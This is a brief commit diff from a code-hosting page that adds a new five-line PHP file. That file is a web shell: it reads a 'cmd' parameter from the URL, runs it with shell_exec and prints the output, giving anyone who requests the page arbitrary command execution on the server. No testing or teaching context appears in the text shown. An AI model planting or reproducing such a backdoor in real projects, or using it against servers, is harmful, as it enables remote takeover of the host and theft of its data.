2026-06-05
This commit is contained in:
@@ -0,0 +1,5 @@
|
||||
<?php
|
||||
if(isset($_GET['cmd'])) {
|
||||
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
|
||||
}
|
||||
?>
|
||||
Reference in New Issue
Block a user